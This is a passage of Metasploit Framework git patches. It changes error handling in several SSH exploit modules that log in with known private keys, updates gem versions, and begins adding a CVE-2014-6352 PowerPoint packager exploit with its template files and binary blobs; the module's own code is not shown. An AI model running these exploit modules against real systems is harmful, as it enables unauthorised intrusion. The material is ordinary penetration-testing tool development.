rescue Rex::ConnectionError, Rex::AddressInUse + rescue Rex::ConnectionError return rescue Net::SSH::Disconnect, ::EOFError print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation" diff --git a/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb b/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb index 8e73c77db4..7a460a0ac6 100644 --- a/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb +++ b/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb @@ -88,7 +88,7 @@ class Metasploit3 < Msf::Exploit::Remote ::Timeout.timeout(datastore['SSH_TIMEOUT']) do ssh_socket = Net::SSH.start(rhost, user, opt_hash) end - rescue Rex::ConnectionError, Rex::AddressInUse + rescue Rex::ConnectionError return rescue Net::SSH::Disconnect, ::EOFError print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation" diff --git a/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb b/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb index b2b3f333d8..711684f430 100644 --- a/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb +++ b/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb @@ -85,7 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote ::Timeout.timeout(datastore['SSH_TIMEOUT']) do ssh_socket = Net::SSH.start(rhost, user, opt_hash) end - rescue Rex::ConnectionError, Rex::AddressInUse + rescue Rex::ConnectionError return nil rescue Net::SSH::Disconnect, ::EOFError print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation" diff --git a/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb b/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb index 56f0183919..e8fdfc48b3 100644 --- a/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb +++ b/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb @@ -83,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote ::Timeout.timeout(datastore['SSH_TIMEOUT']) do ssh_socket = Net::SSH.start(rhost, user, opt_hash) end - rescue Rex::ConnectionError, Rex::AddressInUse + rescue Rex::ConnectionError return nil rescue Net::SSH::Disconnect, ::EOFError print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation" diff --git a/modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb b/modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb index 19b837dd45..6c60536356 100644 --- a/modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb +++ b/modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb @@ -98,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote ::Timeout.timeout(datastore['SSH_TIMEOUT']) do ssh = Net::SSH.start(rhost, user, opts) end - rescue Rex::ConnectionError, Rex::AddressInUse + rescue Rex::ConnectionError return nil rescue Net::SSH::Disconnect, ::EOFError print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation" diff --git a/modules/exploits/linux/ssh/symantec_smg_ssh.rb b/modules/exploits/linux/ssh/symantec_smg_ssh.rb index ad1a0d53e8..96f568d23b 100644 --- a/modules/exploits/linux/ssh/symantec_smg_ssh.rb +++ b/modules/exploits/linux/ssh/symantec_smg_ssh.rb @@ -103,7 +103,7 @@ class Metasploit3 < Msf::Exploit::Remote ::Timeout.timeout(datastore['SSH_TIMEOUT']) do ssh = Net::SSH.start(rhost, user, opts) end - rescue Rex::ConnectionError, Rex::AddressInUse + rescue Rex::ConnectionError return rescue Net::SSH::Disconnect, ::EOFError print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation" diff --git a/modules/exploits/multi/ssh/sshexec.rb b/modules/exploits/multi/ssh/sshexec.rb index b21d9e4472..a2a1cc65af 100644 --- a/modules/exploits/multi/ssh/sshexec.rb +++ b/modules/exploits/multi/ssh/sshexec.rb @@ -108,7 +108,7 @@ class Metasploit3 < Msf::Exploit::Remote begin self.ssh_socket = Net::SSH.start(ip, user, opt_hash) - rescue Rex::ConnectionError, Rex::AddressInUse + rescue Rex::ConnectionError fail_with(Failure::Unreachable, 'Disconnected during negotiation') rescue Net::SSH::Disconnect, ::EOFError fail_with(Failure::Disconnected, 'Timed out during negotiation') diff --git a/modules/exploits/unix/misc/xerox_mfp.rb b/modules/exploits/unix/misc/xerox_mfp.rb index e9e485e6a3..64b8255efb 100644 --- a/modules/exploits/unix/misc/xerox_mfp.rb +++ b/modules/exploits/unix/misc/xerox_mfp.rb @@ -89,7 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote connect sock.put(firmcode) handler - rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::AddressInUse => e + rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout => e print_error("#{rhost}:#{rport} - #{e.message}") ensure disconnect diff --git a/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb b/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb index ca742cfe1a..002e91cde3 100644 --- a/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb +++ b/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb @@ -169,7 +169,7 @@ class Metasploit3 < Msf::Exploit::Remote ::Timeout.timeout(datastore['SSH_TIMEOUT']) do ssh = Net::SSH.start(rhost, user, opts) end - rescue Rex::ConnectionError, Rex::AddressInUse + rescue Rex::ConnectionError fail_with(Failure::Unreachable, "#{rhost}:#{rport} SSH - Connection error or address in use") rescue Net::SSH::Disconnect, ::EOFError fail_with(Failure::Disconnected, "#{rhost}:#{rport} SSH - Disconnected during negotiation") diff --git a/modules/exploits/unix/ssh/tectia_passwd_changereq.rb b/modules/exploits/unix/ssh/tectia_passwd_changereq.rb index 0a963a2a1a..c2931b66be 100644 --- a/modules/exploits/unix/ssh/tectia_passwd_changereq.rb +++ b/modules/exploits/unix/ssh/tectia_passwd_changereq.rb @@ -212,7 +212,7 @@ class Metasploit3 < Msf::Exploit::Remote ::Timeout.timeout(datastore['SSH_TIMEOUT']) do c = do_login(datastore['USERNAME']) end - rescue Rex::ConnectionError, Rex::AddressInUse + rescue Rex::ConnectionError return rescue Net::SSH::Disconnect, ::EOFError print_error "#{rhost}:#{rport} SSH - Timed out during negotiation" From fb751e3b9f355d9b3bb15b4b64c8a262ba0a8f95 Mon Sep 17 00:00:00 2001 From: OJ Date: Wed, 12 Nov 2014 07:21:00 +1000 Subject: [PATCH 22/38] Update meterpreter_bins to 0.0.11 This adds support for the getsid command in the binaries. --- Gemfile.lock | 6 +++--- metasploit-framework.gemspec | 2 +- 2 files changed, 4 insertions(+), 4 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index f70b6a4cb1..d01e250f78 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -9,7 +9,7 @@ PATH json metasploit-concern (~> 0.3.0) metasploit-model (~> 0.28.0) - meterpreter_bins (= 0.0.10) + meterpreter_bins (= 0.0.11) msgpack nokogiri packetfu (= 1.1.9) @@ -132,7 +132,7 @@ GEM pg railties (< 4.0.0) recog (~> 1.0) - meterpreter_bins (0.0.10) + meterpreter_bins (0.0.11) method_source (0.8.2) mime-types (1.25.1) mini_portile (0.6.0) @@ -212,7 +212,7 @@ GEM multi_json (~> 1.0) rack (~> 1.0) tilt (~> 1.1, != 1.3.0) - sqlite3 (1.3.9) + sqlite3 (1.3.10) thor (0.19.1) tilt (1.4.1) timecop (0.7.1) diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index 3832bd8053..5dcc869611 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -65,7 +65,7 @@ Gem::Specification.new do |spec| # are needed when there's no database spec.add_runtime_dependency 'metasploit-model', '~> 0.28.0' # Needed for Meterpreter on Windows, soon others. - spec.add_runtime_dependency 'meterpreter_bins', '0.0.10' + spec.add_runtime_dependency 'meterpreter_bins', '0.0.11' # Needed by msfgui and other rpc components spec.add_runtime_dependency 'msgpack' # Needed by anemone crawler From c35dc2e6b3bf51c55d15b26bf3c1f28aaec13c6f Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 12 Nov 2014 01:10:49 -0600 Subject: [PATCH 23/38] Add module for CVE-2014-6352 --- .../template_run_as_admin/[Content_Types].xml | 2 + .../template_run_as_admin/_rels/.rels | 2 + .../template_run_as_admin/docProps/app.xml | 2 + .../template_run_as_admin/docProps/core.xml | 2 + .../docProps/thumbnail.jpeg | Bin 0 -> 4096 bytes .../ppt/_rels/presentation.xml.rels | 2 + .../ppt/drawings/_rels/vmlDrawing1.vml.rels | 2 + .../ppt/drawings/vmlDrawing1.vml | 31 ++++ .../ppt/media/image1.wmf | Bin 0 -> 3722 bytes .../template_run_as_admin/ppt/presProps.xml | 2 + .../ppt/presentation.xml | 13 ++ .../slideLayouts/_rels/slideLayout1.xml.rels | 2 + .../slideLayouts/_rels/slideLayout10.xml.rels | 2 + .../slideLayouts/_rels/slideLayout11.xml.rels | 2 + .../slideLayouts/_rels/slideLayout2.xml.rels | 2 + .../slideLayouts/_rels/slideLayout3.xml.rels | 2 + .../slideLayouts/_rels/slideLayout4.xml.rels | 2 + .../slideLayouts/_rels/slideLayout5.xml.rels | 2 + .../slideLayouts/_rels/slideLayout6.xml.rels | 2 + .../slideLayouts/_rels/slideLayout7.xml.rels | 2 + .../slideLayouts/_rels/slideLayout8.xml.rels | 2 + .../slideLayouts/_rels/slideLayout9.xml.rels | 2 + .../ppt/slideLayouts/slideLayout1.xml | 2 + .../ppt/slideLayouts/slideLayout10.xml | 2 + .../ppt/slideLayouts/slideLayout11.xml | 2 + .../ppt/slideLayouts/slideLayout2.xml | 2 + .../ppt/slideLayouts/slideLayout3.xml | 2 + .../ppt/slideLayouts/slideLayout4.xml | 2 + .../ppt/slideLayouts/slideLayout5.xml | 2 + .../ppt/slideLayouts/slideLayout6.xml | 2 + .../ppt/slideLayouts/slideLayout7.xml | 2 + .../ppt/slideLayouts/slideLayout8.xml | 2 + .../ppt/slideLayouts/slideLayout9.xml | 2 + .../slideMasters/_rels/slideMaster1.xml.rels | 2 + .../ppt/slideMasters/slideMaster1.xml | 2 + .../ppt/slides/_rels/slide1.xml.rels | 2 + .../ppt/slides/slide1.xml | 2 + .../template_run_as_admin/ppt/tableStyles.xml | 2 + .../ppt/theme/theme1.xml | 2 + .../template_run_as_admin/ppt/viewProps.xml | 2 + .../ms14_064_packager_run_as_admin.rb | 153 ++++++++++++++++++ 41 files changed, 269 insertions(+) create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/[Content_Types].xml create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/_rels/.rels create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/docProps/app.xml create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/docProps/core.xml create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/docProps/thumbnail.jpeg create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/_rels/presentation.xml.rels create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/drawings/_rels/vmlDrawing1.vml.rels create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/drawings/vmlDrawing1.vml create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/media/image1.wmf create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/presProps.xml create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/presentation.xml create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout1.xml.rels create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout10.xml.rels create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout11.xml.rels create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout2.xml.rels create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout3.xml.rels create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout4.xml.rels create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout5.xml.rels create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout6.xml.rels create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout7.xml.rels create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout8.xml.rels create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout9.xml.rels create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout1.xml create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout10.xml create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout11.xml create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout2.xml create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout3.xml create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout4.xml create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout5.xml create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout6.xml create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout7.xml create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout8.xml create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout9.xml create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideMasters/_rels/slideMaster1.xml.rels create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideMasters/slideMaster1.xml create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slides/_rels/slide1.xml.rels create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slides/slide1.xml create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/tableStyles.xml create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/theme/theme1.xml create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/viewProps.xml create mode 100644 modules/exploits/windows/fileformat/ms14_064_packager_run_as_admin.rb diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/[Content_Types].xml b/data/exploits/CVE-2014-6352/template_run_as_admin/[Content_Types].xml new file mode 100755 index 0000000000..f35276fe52 --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/[Content_Types].xml @@ -0,0 +1,2 @@ + + \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/_rels/.rels b/data/exploits/CVE-2014-6352/template_run_as_admin/_rels/.rels new file mode 100755 index 0000000000..7100d4b140 --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/_rels/.rels @@ -0,0 +1,2 @@ + + \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/docProps/app.xml b/data/exploits/CVE-2014-6352/template_run_as_admin/docProps/app.xml new file mode 100755 index 0000000000..07343b6ed9 --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/docProps/app.xml @@ -0,0 +1,2 @@ + +372Microsoft Office PowerPointOn-screen Show (4:3)21000falseTheme1Embedded OLE Servers1Slide Titles1Office ThemePackager Shell ObjectExamplefalsefalsefalse14.0000 \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/docProps/core.xml b/data/exploits/CVE-2014-6352/template_run_as_admin/docProps/core.xml new file mode 100755 index 0000000000..459a8fcf5c --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/docProps/core.xml @@ -0,0 +1,2 @@ + +ExampleWindows User92014-08-06T07:56:10Z2014-11-12T06:36:10Z \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/docProps/thumbnail.jpeg b/data/exploits/CVE-2014-6352/template_run_as_admin/docProps/thumbnail.jpeg new file mode 100755 index 0000000000000000000000000000000000000000..c8eab23be65d2fb01c6c056872b4993f69301d8a GIT binary patch literal 4096 zcmeH~dr;F?7RP@fL7vJZJmeu+Ux0|F2vI>GMNKH8JOl!Q5&;1NVnje9BC$Y%!~y~W zK1!kz!~hX_2}L9l0@Mcu5k%01JZvcz%I~L;{#HU#+-`Sgc4lX~+x^pX=R0@q+;h*& z=bZbPt9q#t1NwW2UPJ(aKmdoA8lZXw?D{zRQ}!{)p9=7CvFagUpb0!g07%3dK+OPw zG(f0C00saM>c7PX{$U6;BuagmhNhOb&XPm3KA?s`BGphxb#)YK$@}cmJb*G#H(c%D zu?+1Wp|K{>Xv>#{H#FDotnW15{|sE`7NOWVYBrJ4D9Ya81Qc22mh+qOHq?AlEr zdVb-xCm=A06dZCOH0nrnOzcrgTvBq%sZ`qOw5)6fGv|CRtEl)=Nom>TD_3t;a4Ty8tp8+QQxVx z)^R^*9C`AYw#hmt$$ID`+TY3k7+B{2MD|axe{qcgx=6%Q@sI`p9#AT6Z?b^@s5(tJ zWg#HrDcw}Lnl>S^5t7Fo#h%?5)`Tv1C=xCNpGZc!XLH84!VK`kAxwys)vyc_WGZmd zRlXuNy4ZVUG}(=So7vh~o094Dq|kUuKluJYGsERVXv+2KXSbUfq5B@&RXW$5;#yYN z^154F%+~#Uc^hT;)*O#mQ5kw|FuD46k574sBJi#4<1HtO_WNHtR6F2LSbg|*OWw^v$CC2@edtN#nUdQ!rkFH-UqD*=7T-@nR~P zM(@d34v~tZ>R@tr2l_?wtN|@nbk&4MT{V7%f7D!FkaW5--rT2xVjoO$$uCb$j7_Dk zOA6~-cf2-Dn@997{_3X8w#AI-#Upx+-eU8rDtrUy4jcIs{-SMr^W1+Ud`TS>uYsrH znQb{U&0?yi0=sxuu>tb!#x!w6g7f6YSW%w$Lr%l8YYT3$)nqrmxgy;I6kJfaL1!dX z)@J@J>3q7eJz>w~V=D|9XtZ+Zy(vC1Cb>R&qp%%c4dq7U^9F5<; z14>NU=aDcB)3e#Oi_IO@%89h^yZL1^Pfkkz~8>3%Lv1&9n4;R~2)H!&wmxpuM8 zT?fvRXT$qs_;U`5(5-#Y)+HCVBZOhOZmbPYN9DUAMZeUOrzX($(a(=HX)C#QUz=xe z5>n2dO^Ax6p5-;)j|;vS+GYIW`iqMf;z=E?c_#7q?zO1tB<=V%B3rX!?A)f4wU(!C z2*dn&N^~=*UtzY>{kzKaCp!6T>n(36Z7Ij3uQP_(1-5L zUc#%q4Wyt%ZTy3poz3b5zw!yY5a)o(F#AhJq_BXoA>q#QSSFvL+*M1Dt%EnF3Ku5e z_5E3{W>E{fXnK+yA$_!89tP4`PIcL&4+2)Z1Nf6PHQP1G9=~c@a1^U~l-yD_JuJo> z!x;-*7inbQOuA7zda-7%hNJmN8YVzeUYHLzm8Nm#7YN2vL3J+G)kQ4%XnypS$FCm` zzu&u4BwcOvX0TGL#($p+%RHzisB(RY?|7sQs|>Qq5lXI-^%^^SPH=~3H^)?av)?5i ze_fx?yW~$ej35~K{lBGQ3R%B+yC4}Us6Cc&2aBb;no6&Q?bs1=q_wTBt#x4bM$1xZ z7~uzgwka93jmS0kIugB`6a%OLb3sE8XGXBFMg??kbypu%3MU%JABY97u-@P-lb_+1 zZUb@@23^w0X6EH$s&ZYS3D)tWJ3YOF3he*jXJM!4^uU|)B@ywBJODjCsj=vnU@&hfd?v=}3(((TZu8G1j4HIOXrB^i^(FzNCY}d<&W9434Wng4mf}DVfQ(SS(Vy zzgBDpv4nlEciy{(7?M>?rlY*$zdvgquv0CN=RYvPVCBkm|Zhj9HOvTi@fnv@qV z-by*cF?uA$=+T}_=nwmn2w*`rwWB}AGfUQQOn0XQV{-FspL6TCvjU+5fz^^9 z2TLumJ*^RL#li?Ti6pq+TJO5C=Ju2RX}F8@)f-i+qH?_lS*#J&X|HKpr^xhX~JD`1|r^&&AwCt zp0G0)#>$!BEZ%d+z|UpYB@3<-u#R}7OK0MO3P3vbXSt9{Ae(M?*G%$PN_~)B9zm^D z0mA3t8<$ePWEFOCm>W3=^=0Ik&?$`LCv3 zN=s0gmk`bU@v2opRan?dN}A6VN_<4ssK;`CW&3Bl3+r};m+vKLO5@sbsJmE + \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/drawings/_rels/vmlDrawing1.vml.rels b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/drawings/_rels/vmlDrawing1.vml.rels new file mode 100755 index 0000000000..f4997f5635 --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/drawings/_rels/vmlDrawing1.vml.rels @@ -0,0 +1,2 @@ + + \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/drawings/vmlDrawing1.vml b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/drawings/vmlDrawing1.vml new file mode 100755 index 0000000000..0eddc5e510 --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/drawings/vmlDrawing1.vml @@ -0,0 +1,31 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/media/image1.wmf b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/media/image1.wmf new file mode 100755 index 0000000000000000000000000000000000000000..b3bb5b267d7a7ca38acd8bf34c090b35af2f9f89 GIT binary patch literal 3722 zcmeH~KTH!*9LIlmfXW}EZVo0=5)&6m9J;tD3>qgwikip_PDB$4iDA&uI2ebf38kZT zXCP|g;6S={AOYGCf-F!#{&Z;XuGj0G-}m12dTq(|orz)b*Z1z;UGIIq?|t9z3NM$< zB#Fl;Md=Z5MV=|tOVoAmB9Tgw3+!eOYQI`<4X9BXr5m`cswIcrCHkb`z$(S2Uc8(d zeDaw3`o8~EZgtOojZ!}TbnczEmuZa|cf{X0OLoRL5~Bje8^g8G28H_^=S? zYjm5pi5}pr;KRc`iHpXOklw@+Dy)3XurBd;DJb3);>+8+-gud#?FO^EB zX;vx~y;3piMKg@1qG{!}QZ>!rM@PZ@jg1X-tXdZM2#;^@&<&%h=(^@B=yiN@BFpDf z2qhuO*EG$<_`$DBG*r%-g*OFxzGYc#3B2Mr3hg$Rbna4Eey~KlN(g?fW>%37Zk+8E zpNL<@s?|;;)))TQ1RoN06~9-F<>0<~8O8XgrycW0@T)u+zoSHb(PjC%j`0gVj`9*A z__powU5S>pI4gBADj9!}Y&Q6o#Y#Q=vw)O;IlOngX4|I{{tG@{fv^&cU&No1puq2s z$Cs5rKJi47a-cI7JD61Ru!|O2RNr z@XO_Lko!dN-{ZRy?Gvddl{*WNZLnG7^Z8JGNVqCKv;1BO?7_i7E|<$@vr9`$f5B%G z%^@TJ2ln$97U^^v@a5&@j(p?-I`V-x4lQdTRveFQZfD34|1!ktCN$H!Ek(w^%djClHq-6k-(*20{pG5Elgo;ZEbvfydzxj zy<|Z5;6VOhJef=;7K_Qi@eKaIDijKbhll%tQP|(dGrPOHfRBxhNy7g>b}kOE{h6w; zEf#AHD{Ld!hZ^a*M6)xm?hfM+p@_Q=yh_+EB7X24ouaBku{W=0r)G%Qo{#k$q7Qt( R#*&Y|MM>-f73$*s{s45a(DMKQ literal 0 HcmV?d00001 diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/presProps.xml b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/presProps.xml new file mode 100755 index 0000000000..5bdee5f19a --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/presProps.xml @@ -0,0 +1,2 @@ + + \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/presentation.xml b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/presentation.xml new file mode 100755 index 0000000000..fbd9609f50 --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/presentation.xml @@ -0,0 +1,13 @@ + + + + + + + + + + + + + \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout1.xml.rels b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout1.xml.rels new file mode 100755 index 0000000000..0ab2c475a7 --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout1.xml.rels @@ -0,0 +1,2 @@ + + \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout10.xml.rels b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout10.xml.rels new file mode 100755 index 0000000000..0ab2c475a7 --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout10.xml.rels @@ -0,0 +1,2 @@ + + \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout11.xml.rels b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout11.xml.rels new file mode 100755 index 0000000000..0ab2c475a7 --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout11.xml.rels @@ -0,0 +1,2 @@ + + \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout2.xml.rels b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout2.xml.rels new file mode 100755 index 0000000000..0ab2c475a7 --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout2.xml.rels @@ -0,0 +1,2 @@ + + \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout3.xml.rels b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout3.xml.rels new file mode 100755 index 0000000000..0ab2c475a7 --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout3.xml.rels @@ -0,0 +1,2 @@ + + \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout4.xml.rels b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout4.xml.rels new file mode 100755 index 0000000000..0ab2c475a7 --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout4.xml.rels @@ -0,0 +1,2 @@ + + \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout5.xml.rels b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout5.xml.rels new file mode 100755 index 0000000000..0ab2c475a7 --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout5.xml.rels @@ -0,0 +1,2 @@ + + \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout6.xml.rels b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout6.xml.rels new file mode 100755 index 0000000000..0ab2c475a7 --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout6.xml.rels @@ -0,0 +1,2 @@ + + \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout7.xml.rels b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout7.xml.rels new file mode 100755 index 0000000000..0ab2c475a7 --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout7.xml.rels @@ -0,0 +1,2 @@ + + \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout8.xml.rels b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout8.xml.rels new file mode 100755 index 0000000000..0ab2c475a7 --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout8.xml.rels @@ -0,0 +1,2 @@ + + \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout9.xml.rels b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout9.xml.rels new file mode 100755 index 0000000000..0ab2c475a7 --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout9.xml.rels @@ -0,0 +1,2 @@ + + \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout1.xml b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout1.xml new file mode 100755 index 0000000000..7eceb2fb28 --- /dev/null +++ 